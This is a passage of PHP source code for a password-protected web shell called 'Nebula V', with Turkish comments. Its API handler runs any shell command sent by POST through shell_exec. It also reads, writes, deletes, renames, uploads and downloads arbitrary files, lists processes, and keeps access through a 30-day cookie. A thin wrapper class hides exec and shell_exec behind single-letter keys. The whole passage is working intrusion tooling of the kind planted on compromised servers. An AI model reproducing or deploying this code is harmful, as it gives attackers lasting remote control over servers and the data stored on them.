'destroyed'])); } if (isset($_GET['logout'])) { if (session_status() === PHP_SESSION_ACTIVE) { session_destroy(); } nb_clear_cookie($auth_cookie); nb_clear_cookie($cwd_cookie); header('Location: '.strtok($_SERVER['REQUEST_URI'], '?')); exit; } if (!isset($_SESSION['nebula_auth'])) { if (isset($_POST['k']) && hash('sha256', $_POST['k']) === $auth_hash) { $_SESSION['nebula_auth'] = true; $_SESSION['cwd'] = @getcwd() ?: '/'; nb_set_cookie($auth_cookie, $auth_cookie_value, time() + 86400 * 30); nb_set_cookie($cwd_cookie, $_SESSION['cwd'], time() + 86400 * 30); } else { ob_end_clean(); if ($is_api_request) { header('Content-Type: application/json'); http_response_code(401); die(json_encode(['error' => 'AUTH_REQUIRED'])); } die('
'); } } // 5. Core - Güvenli dinamik fonksiyon çağrısı class Core { public function r($n, ...$a) { if($n=='x') { return @shell_exec($a[0]." 2>&1"); } $m = [ 'e'=>'exec', 's'=>'scandir', 'f'=>'file_get_contents', 'w'=>'file_put_contents', 'r'=>'rename', 'u'=>'unlink', 'c'=>'chmod' ]; if(isset($m[$n]) && function_exists($m[$n])) { return @call_user_func_array($m[$n], $a); } return false; } } $sys = new Core(); // 6. CWD Handling - NULL-safe $current_dir = @getcwd(); if($current_dir === false || $current_dir === null) { $current_dir = '/'; } if(!isset($_SESSION['cwd']) || empty($_SESSION['cwd']) || !@is_dir($_SESSION['cwd'])) { $_SESSION['cwd'] = $current_dir; } nb_set_cookie($cwd_cookie, $_SESSION['cwd'], time() + 86400 * 30); $cwd = $_SESSION['cwd']; // JavaScript için @chdir($_SESSION['cwd']); // 7. API Handler if (isset($_POST['req'])) { if(ob_get_level() > 0) ob_clean(); $req = $_POST['req']; if($req !== 'download') header('Content-Type: application/json'); if ($req === 'cmd') { $cmd = $_POST['c']; $out = ''; if (preg_match('/^cd\s+(.*)$/', $cmd, $m)) { $target = trim($m[1]); if($target == '') $target = '/'; if (@chdir($target)) { $_SESSION['cwd'] = @getcwd() ?: $target; nb_set_cookie($cwd_cookie, $_SESSION['cwd'], time() + 86400 * 30); } else { $out = "cd: error: $target"; } } else { $out = $sys->r('x', $cmd); } echo json_encode(['out' => $out, 'cwd' => $_SESSION['cwd']]); exit; } if ($req === 'list') { $path = $_POST['path'] ?? $_SESSION['cwd']; if(empty($path)) $path = $_SESSION['cwd']; if(@is_dir($path)) { @chdir($path); $_SESSION['cwd'] = $path; nb_set_cookie($cwd_cookie, $_SESSION['cwd'], time() + 86400 * 30); $items = @scandir($path); $res = []; if($items) { foreach($items as $i) { if($i == '.') continue; $p = $path . DIRECTORY_SEPARATOR . $i; $stat = @stat($p); $res[] = [ 'n' => $i, 'd' => @is_dir($p), 's' => @is_dir($p) ? '-' : round(($stat['size']??0)/1024, 2).' KB', 'p' => substr(sprintf('%o', @fileperms($p)), -4), ]; } } echo json_encode(['files' => $res, 'cwd' => $path]); } else { echo json_encode(['error' => 'Path Error']); } exit; } if ($req === 'read') { $c = @file_get_contents($_POST['f']); echo json_encode(['data' => base64_encode($c)]); exit; } if ($req === 'save') { echo json_encode(['status' => @file_put_contents($_POST['f'], base64_decode($_POST['c']))]); exit; } if ($req === 'del') { echo json_encode(['status' => @unlink($_POST['f'])]); exit; } if ($req === 'rename') { echo json_encode(['status' => @rename($_POST['old'], $_POST['new'])]); exit; } if ($req === 'upload') { @move_uploaded_file($_FILES['file']['tmp_name'], $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $_FILES['file']['name']); exit; } if ($req === 'ps') { echo json_encode(['out' => @shell_exec('ps aux')]); exit; } if ($req === 'download') { $f = $_POST['f']; if(file_exists($f)){ header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($f).'"'); header('Content-Length: '.filesize($f)); readfile($f); } exit; } exit; } if(ob_get_level() > 0) ob_clean(); ?> Nebula V
NameSizePermsActions